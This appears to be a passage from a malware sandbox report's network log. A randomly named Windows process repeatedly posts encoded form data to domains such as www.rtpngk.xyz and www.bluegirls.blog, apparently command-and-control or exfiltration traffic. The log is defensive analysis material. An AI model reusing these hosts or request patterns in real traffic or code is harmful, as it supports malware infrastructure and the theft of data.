                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:37:36.663703918 CEST  691                IN         HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:35 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                Sep 23, 2024 14:37:36.663927078 CEST  691                IN         HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:35 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                Sep 23, 2024 14:37:36.664376020 CEST  691                IN         HTTP/1.1 404 Not Found
                                Server: nginx
                                Date: Mon, 23 Sep 2024 12:37:35 GMT
                                Content-Type: text/html
                                Content-Length: 548
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                9           192.168.2.7  49713        188.114.97.3    80                3040  C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 23, 2024 14:37:41.729139090 CEST  734                OUT        POST /yhsl/ HTTP/1.1
                                Host: www.rtpngk.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.rtpngk.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.rtpngk.xyz/yhsl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 30 47 47 6d 2f 65 4c 51 73 75 69 58 64 46 5a 4e 47 45 4c 5a 6c 67 54 68 68 57 4f 38 70 37 39 6a 30 6c 53 6e 6b 57 63 4b 77 63 71 57 6e 77 67 6c 59 2b 72 74 76 45 41 59 43 7a 41 66 65 41 55 68 6c 2b 32 44 67 58 46 4e 67 4f 4f 5a 6d 70 45 55 77 68 31 6f 48 45 31 4e 48 78 4b 79 6c 64 75 54 6b 46 6f 6a 53 6d 6e 35 56 54 38 4d 43 6a 6c 47 2b 45 62 49 58 4a 74 31 62 58 62 39 68 4d 75 4c 58 6c 51 66 6c 68 6b 47 5a 6f 46 4b 76 6f 41 66 56 46 4c 49 6c 46 54 51 48 42 67 64 6c 46 6d 2b 71 6a 34 61 7a 6b 46 41 76 39 6c 6c 35 4b 76 39 64 44 30 52 44 45 78 62 71 51 44 47 37 5a 30 42 56 56 2b 72 36 45 6a 49 61 73 57 37 7a 6e 44 46 4d 51 3d 3d
                                Data Ascii: 76=0GGm/eLQsuiXdFZNGELZlgThhWO8p79j0lSnkWcKwcqWnwglY+rtvEAYCzAfeAUhl+2DgXFNgOOZmpEUwh1oHE1NHxKylduTkFojSmn5VT8MCjlG+EbIXJt1bXb9hMuLXlQflhkGZoFKvoAfVFLIlFTQHBgdlFm+qj4azkFAv9ll5Kv9dD0RDExbqQDG7Z0BVV+r6EjIasW7znDFMQ==
                                Sep 23, 2024 14:37:42.194437027 CEST  814                IN         HTTP/1.1 301 Moved Permanently
                                Date: Mon, 23 Sep 2024 12:37:42 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Mon, 23 Sep 2024 13:37:42 GMT
                                Location: https://www.rtpngk.xyz/yhsl/
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WbRBCIA4aL832PO5oYqpAo5pu8t%2B6LSgEqlnWP8QYrPTih5ox8MiuYNaRRtNoJ6AMm3X2jcoPx00ZAVy3f4Kv%2B%2Fai9MjnUNBClSfptdwtsAjK%2FU2RSqvwT25Ocr4mnvKmA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                Server: cloudflare
                                CF-RAY: 8c7a966a4c48440d-EWR
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                10          192.168.2.7  49714        188.114.97.3    80                3040  C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 23, 2024 14:37:44.726186991 CEST  754                OUT        POST /yhsl/ HTTP/1.1
                                Host: www.rtpngk.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.rtpngk.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.rtpngk.xyz/yhsl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 30 47 47 6d 2f 65 4c 51 73 75 69 58 64 6d 42 4e 41 6c 4c 5a 6a 41 54 69 69 57 4f 38 69 62 38 71 30 6c 4f 6e 6b 58 59 61 33 70 36 57 70 31 45 6c 4b 76 72 74 36 45 41 59 4a 54 42 55 42 51 55 71 6c 2b 4b 78 67 57 35 4e 67 4f 4b 5a 6d 73 67 55 77 57 68 76 46 55 31 44 50 52 4b 77 36 4e 75 54 6b 46 6f 6a 53 69 32 55 56 54 6b 4d 46 53 56 47 35 56 62 48 64 70 74 30 61 58 62 39 32 63 75 48 58 6c 51 68 6c 67 49 67 5a 71 39 4b 76 73 49 66 56 55 4c 4c 38 31 54 53 44 42 68 4f 73 33 50 48 74 43 49 61 32 46 42 55 33 36 34 42 31 63 79 66 48 68 34 39 64 56 4a 67 75 53 6e 77 73 2f 70 30 58 55 36 7a 33 6d 58 70 46 62 7a 52 2b 31 69 42 61 6a 57 43 2b 63 64 50 46 79 4c 6e 7a 2b 4f 74 67 47 33 38 4b 57 49 3d
                                Data Ascii: 76=0GGm/eLQsuiXdmBNAlLZjATiiWO8ib8q0lOnkXYa3p6Wp1ElKvrt6EAYJTBUBQUql+KxgW5NgOKZmsgUwWhvFU1DPRKw6NuTkFojSi2UVTkMFSVG5VbHdpt0aXb92cuHXlQhlgIgZq9KvsIfVULL81TSDBhOs3PHtCIa2FBU364B1cyfHh49dVJguSnws/p0XU6z3mXpFbzR+1iBajWC+cdPFyLnz+OtgG38KWI=
                                Sep 23, 2024 14:37:45.169430017 CEST  820                IN         HTTP/1.1 301 Moved Permanently
                                Date: Mon, 23 Sep 2024 12:37:45 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Mon, 23 Sep 2024 13:37:45 GMT
                                Location: https://www.rtpngk.xyz/yhsl/
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BS9hApzbD8MkVH1h6KOQjqYo4sKp1S8nuqUxcUR6O6yGh9yENwvEU4PqNNMe2h4%2Beobxlx%2B%2F675cTTK0%2Bofr0w%2FBjhABOy33l%2F%2FXWtUBxXBoJOmjx4mxY4jZuasTNQvI7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                Server: cloudflare
                                CF-RAY: 8c7a967cf87b423e-EWR
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                11          192.168.2.7  49715        188.114.97.3    80                3040  C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 23, 2024 14:37:48.084470034 CEST  1767               OUT        POST /yhsl/ HTTP/1.1
                                Host: www.rtpngk.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.rtpngk.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.rtpngk.xyz/yhsl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 30 47 47 6d 2f 65 4c 51 73 75 69 58 64 6d 42 4e 41 6c 4c 5a 6a 41 54 69 69 57 4f 38 69 62 38 71 30 6c 4f 6e 6b 58 59 61 33 70 79 57 70 44 59 6c 59 63 7a 74 38 30 41 59 45 7a 41 54 42 51 55 33 6c 2b 69 31 67 57 30 79 67 4d 43 5a 6b 4b 38 55 32 6a 4e 76 50 55 31 44 44 78 4b 7a 6c 64 76 5a 6b 46 34 5a 53 6d 71 55 56 54 6b 4d 46 52 4e 47 76 55 62 48 53 4a 74 31 62 58 62 78 68 4d 75 72 58 6d 67 58 6c 67 38 57 5a 36 64 4b 73 4e 30 66 5a 47 54 4c 30 31 54 55 50 68 67 4a 73 33 54 6d 74 43 46 68 32 46 6c 2b 33 39 55 42 77 36 48 43 65 69 38 56 66 69 68 6e 75 53 48 47 75 70 68 75 50 69 47 4a 77 48 6e 49 4a 70 54 74 78 6d 75 2f 58 7a 66 55 6a 61 6c 5a 64 78 79 2b 37 70 54 34 79 47 54 62 5a 79 68 36 78 47 58 68 76 4f 59 63 30 58 6e 74 33 65 55 4a 4e 4a 7a 4a 32 77 66 6c 6b 30 72 57 37 68 35 41 54 38 4f 66 65 4c 38 42 39 73 35 69 4d 34 54 79 4b 2f 30 4e 7a 6e 70 67 51 53 37 66 47 57 6a 34 48 51 45 6f 48 42 51 2f 78 45 63 6c 4b 31 71 33 7a 6f 34 4d 45 30 68 6c 41 33 4f 4f 61 36 74 4e 53 32 64 38 7a 72 67 [TRUNCATED]
                                Data Ascii: 76=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 [TRUNCATED]
                                Sep 23, 2024 14:37:48.552010059 CEST  808                IN         HTTP/1.1 301 Moved Permanently
                                Date: Mon, 23 Sep 2024 12:37:48 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Mon, 23 Sep 2024 13:37:48 GMT
                                Location: https://www.rtpngk.xyz/yhsl/
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tObdvQuvgbak1KPlLHECgKLZIyN3OIqVva2%2Fvit93yqOIHSUEZ6p4VCbhMRFa4so4TRfspyZeKEAkmzUpzJ5FI2m2WPghnuwyyeudRScZxfv7KMKRRGZNUpZNAiMkgFzRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Vary: Accept-Encoding
                                Server: cloudflare
                                CF-RAY: 8c7a96921d972361-EWR
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                12          192.168.2.7  49716        188.114.97.3    80                3040  C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp                             Bytes transferred  Direction  Data
                                Sep 23, 2024 14:37:50.630011082 CEST  475                OUT        GET /yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo2Uxd0f+FrZwD+wtTCitgNQzIzPqlhTclUhz8bxA3FGZPimHZW40XTk/UgPnbZQA2uTwzCdxs&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.rtpngk.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:37:51.080991983 CEST  992                IN         HTTP/1.1 301 Moved Permanently
                                Date: Mon, 23 Sep 2024 12:37:51 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Mon, 23 Sep 2024 13:37:51 GMT
                                Location: https://www.rtpngk.xyz/yhsl/?76=5EuG8q3RnsmESHA8JVSnlizd0lq9q8glk1nzqEFI9PKQqCJAfa6foAENeypwFyQKjeyo2Uxd0f+FrZwD+wtTCitgNQzIzPqlhTclUhz8bxA3FGZPimHZW40XTk/UgPnbZQA2uTwzCdxs&mtJD_=fvdlJ2L
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eSAbk1p68gZhJkkCVintsdVG8UDCZiPLnBXBsBgv63D1tTKrCwPHZJFB9i3ITNIHri1QM2BbDqk1TFzX4wM92spc9PrW3N7yp9UVWfk%2Bo6hK3W%2FvoJG%2FBUgK1ckzqIro%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Speculation-Rules: "/cdn-cgi/speculation"
                                Server: cloudflare
                                CF-RAY: 8c7a96a1e903c32f-EWR
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                13 | 192.168.2.7 | 49717 | 195.110.124.133 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:37:56.231558084 CEST | 746 | OUT | POST /7m8b/ HTTP/1.1
                                Host: www.bluegirls.blog
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bluegirls.blog
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.bluegirls.blog/7m8b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=eWBPvq1lX887FNULmr7s5s0Bh2R+0wQ2hgtfI52mgcMzCOaX8wrak5JjdltnjNUDLOkggSP2oEma7AUMEAx6tx4N3SRW1ganjOelMhHhil6/nZwp74yaAXtAs+wheaD1RoivAFCg0/JqXF/d78FPUm1lLY0sGRSS6pDW4FdzmjQ5rcRf67VgWjL1dB6NEZ4jhTR7e2R+9FWxa8FGkw==
                                Sep 23, 2024 14:37:56.855519056 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:37:56 GMT
                                Server: Apache
                                Content-Length: 203
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /7m8b/ was not found on this server.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                14 | 192.168.2.7 | 49718 | 195.110.124.133 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:37:58.783951044 CEST | 766 | OUT | POST /7m8b/ HTTP/1.1
                                Host: www.bluegirls.blog
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bluegirls.blog
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.bluegirls.blog/7m8b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Ascii: 76=eWBPvq1lX887GsELrq7so80GuWR+7QQyhnlfI4y2gu4zBuqX9xral5JjVFtinNVPLOoWgXv2oEya7FoMFzZ9iB4P+yRY4AanjOelMhTHily/nIAp9dGbN3tDr+whaaD5RojMAAr308xqXHnd4tFMPW1ZUo07GT7s3a/dxDRRuxMqqqM9gZZMIyzOZDe7T/lWjSVjTUlfiyzbXukCyH6Vu9top5DRwKAXCkjTU3U=
                                Sep 23, 2024 14:37:59.468683004 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:37:59 GMT
                                Server: Apache
                                Content-Length: 203
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /7m8b/ was not found on this server.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                15 | 192.168.2.7 | 49719 | 195.110.124.133 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:38:01.333888054 CEST | 1779 | OUT | POST /7m8b/ HTTP/1.1
                                Host: www.bluegirls.blog
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.bluegirls.blog
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.bluegirls.blog/7m8b/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:38:02.168457031 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:01 GMT
                                Server: Apache
                                Content-Length: 203
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /7m8b/ was not found on this server.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                16 | 192.168.2.7 | 49720 | 195.110.124.133 | 80 | 3040 | C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Sep 23, 2024 14:38:03.876590967 CEST | 479 | OUT | GET /7m8b/?76=TUpvsdJ0cs84UNNTqqi2wOMj02pU6E0u1A17Lrv5qeBoN9jB/n++wLdBNnRIp/FdR+Ur2HOcuniO4FwpOA1JnwQ/5G5V4geMmZeqJSORp3yZ3MMA5ZHYDD9/sYl5a677eMHhDnCl+rJp&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.bluegirls.blog
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:38:04.654149055 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 23 Sep 2024 12:38:04 GMT
                                Server: Apache
                                Content-Length: 203
